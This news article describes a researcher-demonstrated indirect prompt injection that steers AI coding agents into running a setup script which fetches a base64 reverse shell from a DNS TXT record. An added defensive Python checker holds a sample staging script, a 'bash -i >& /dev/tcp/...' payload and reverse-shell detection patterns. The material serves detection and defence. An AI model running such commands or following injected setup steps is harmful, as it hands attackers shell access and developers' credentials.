Indirect Prompt Injection in Claude Code Opens Reverse Shell on Developer Machines

Mozilla researchers demonstrate how AI coding agents can be tricked into opening reverse shells through clean-looking repositories, with payloads hidden entirely in DNS records.

CSBadmin
3 Min Read

Attack Chain Exploits AI Agent Trust Boundaries

Researchers at Mozilla's Zero Day Investigative Network (0DIN) have demonstrated a proof-of-concept attack that compromises developer workstations through AI-powered coding agents such as Claude Code. The attack uses indirect prompt injection, classified by OWASP as LLM01:2025 (Prompt Injection): the malicious instructions are embedded in external content the agent processes, here a repository and an error message, rather than typed by the user. The result is a reverse shell running with the developer's own user privileges, which exposes everything in that environment, including API keys and cloud credentials.

The attack chains three seemingly innocuous components. A GitHub repository presents a legitimate-looking setup flow for a fictional tool called "Axiom." A Python package is engineered to fail on first use with a routine-looking error message that steers the agent toward the repository's setup script. That setup script then fetches its real payload from an attacker-controlled DNS TXT record, decodes the base64 content, and executes it, so the reverse shell never appears in the repository and stays invisible to static code scanners, human reviewers, and the AI agent itself. The developer sees only normal terminal output while the attacker gains full interactive shell access.

Defensive Gaps and Broader Implications

The attack surface extends beyond Claude Code to other agentic coding tools, including Cursor and Gemini CLI. The technique exploits a fundamental architectural gap: its components span three separate systems that are never examined together. Static analysis sees a DNS lookup in a shell script with no malicious content. Human review sees normal setup instructions. Network monitoring sees routine DNS resolution. The AI agent sees a pre-authorized setup step and never evaluates what the DNS record actually contains.
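The missing step in both paragraphs above is the one nobody performs: resolving the TXT record the setup script depends on and looking at what it decodes to before the script runs. The following is an added example, not code from 0DIN or from any of the tools named in the article, of a pre-execution check that does exactly that. It has a static pass (find the line where a TXT lookup is piped into an interpreter, directly or via a captured variable) and a dynamic pass (decode the record and match it against reverse-shell indicators). The sample setup script, the `cfg.example.invalid` hostname, the `FAKE_ZONE` dictionary standing in for a live resolver, and the 192.0.2.10 address are all constructed for the example.

```python
"""Pre-execution check for DNS-TXT-staged payloads in a setup script.

Added example (not the 0DIN proof of concept): a static pass finds where a
script pipes a TXT lookup into an interpreter, and a dynamic pass resolves
that record and decodes it, the step the article says nobody performs.
"""
import base64
import binascii
import re

# Static side: a TXT lookup, and an execution sink that its output reaches.
DNS_TXT_LOOKUP = re.compile(r"\b(?:dig|nslookup|host|drill|resolvectl)\b[^\n]*\bTXT\b", re.I)
EXEC_SINK = re.compile(r"\|\s*(?:base64\s+(?:-d|--decode)\s*\|\s*)?(?:ba|z|da)?sh\b|\beval\b", re.I)
VAR_CAPTURE = re.compile(r"^\s*(?:export\s+)?([A-Za-z_]\w*)=")
# Hostname either before or after the record type (dig accepts both orders).
HOST_BEFORE_TYPE = re.compile(r"([A-Za-z0-9.-]+\.[A-Za-z]{2,})\s+TXT\b")
HOST_AFTER_TYPE = re.compile(r"\bTXT\s+([A-Za-z0-9.-]+\.[A-Za-z]{2,})")

# Dynamic side: what a decoded record looks like when it is a reverse shell.
REVERSE_SHELL_INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/"),
    "interactive_shell": re.compile(r"\b(?:ba|z)?sh\s+-i\b"),
    "netcat_exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s(?:-e|--exec)\s"),
    "python_socket": re.compile(r"socket\.socket\(.*\.connect\("),
    "stdin_to_socket": re.compile(r"0[<>]&1"),
}


def find_dns_staging(script: str) -> list[tuple[int, str]]:
    """Return (line_no, line) pairs where TXT lookup output reaches an interpreter.

    Handles the inline form `dig ... TXT ... | sh` and the two-step form where
    the lookup is captured into a variable that a later line pipes into sh.
    """
    findings, tainted = [], set()
    for no, line in enumerate(script.splitlines(), 1):
        if DNS_TXT_LOOKUP.search(line):
            if EXEC_SINK.search(line):
                findings.append((no, line.strip()))
            cap = VAR_CAPTURE.match(line)
            if cap:
                tainted.add(cap.group(1))
            continue
        if EXEC_SINK.search(line) and any(
            re.search(r"\$\{?%s\b" % re.escape(v), line) for v in tainted
        ):
            findings.append((no, line.strip()))
    return findings


def txt_hostnames(script: str) -> list[str]:
    """Hostnames whose TXT records the script queries."""
    return HOST_BEFORE_TYPE.findall(script) + HOST_AFTER_TYPE.findall(script)


def decode_txt_record(record: str):
    """Join a TXT record's quoted chunks and base64-decode; None if not base64 text."""
    chunks = re.findall(r'"([^"]*)"', record)
    raw = "".join(chunks) if chunks else record.strip()
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def classify_payload(decoded: str) -> list[str]:
    """Names of the reverse-shell indicators present in decoded record text."""
    return [name for name, rx in REVERSE_SHELL_INDICATORS.items() if rx.search(decoded)]


def audit(script: str, resolver) -> dict:
    """Combine both passes. `resolver(host)` returns the TXT record text or None."""
    staging = find_dns_staging(script)
    records = {}
    for host in txt_hostnames(script):
        rec = resolver(host)
        decoded = decode_txt_record(rec) if rec is not None else None
        records[host] = {
            "decoded": decoded,
            "indicators": classify_payload(decoded) if decoded else [],
        }
    if staging and any(r["indicators"] for r in records.values()):
        verdict = "block"          # script stages code from DNS and it is a shell
    elif staging:
        verdict = "review"         # stages code from DNS; content unrecognised
    else:
        verdict = "allow"
    return {"staging_lines": staging, "records": records, "verdict": verdict}


# Constructed sample: a setup script in the shape the article describes.
SAMPLE_SETUP_SH = """#!/bin/sh
set -e
echo "Installing axiom runtime..."
CFG=$(dig +short cfg.example.invalid TXT | tr -d '"')
echo "$CFG" | base64 -d | sh
echo "Done."
"""

# Constructed stand-in for the attacker's zone (192.0.2.10 is documentation
# address space). Long TXT strings are split into quoted chunks, as on the wire.
_PAYLOAD = base64.b64encode(b"bash -i >& /dev/tcp/192.0.2.10/4444 0>&1").decode()
FAKE_ZONE = {
    "cfg.example.invalid": f'"{_PAYLOAD[:20]}" "{_PAYLOAD[20:]}"',
    "example.invalid": '"v=spf1 -all"',
}

if __name__ == "__main__":
    print(audit(SAMPLE_SETUP_SH, FAKE_ZONE.get))
```

In practice the `resolver` argument would be a real lookup (for example `dns.resolver.resolve(host, "TXT")` from dnspython) and the check would run as a pre-commit or agent-hook gate that refuses to execute a script whose verdict is `block` and asks a human to look at one marked `review`. The indicator list is deliberately short; the point is that decoding the record at all is what closes the gap, not the completeness of the signatures.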

This technique mirrors CVE-2025-55284, a high-severity Claude Code vulnerability patched in June 2025 in which data was exfiltrated by encoding it into DNS subdomain lookups. Unit 42 documented the first large-scale indirect prompt injection attacks in the wild in March 2026. Agentic coding tools hold authorized access to private environment variables, credentials, and API keys while consuming untrusted content from repositories and error messages. Until vendors make the full runtime execution chain visible to the user and developers adopt sandbox-first workflows for unfamiliar code, this attack vector remains actively exploitable.

Source: Cyber Security News

CSBadmin

The latest in cybersecurity news and updates.
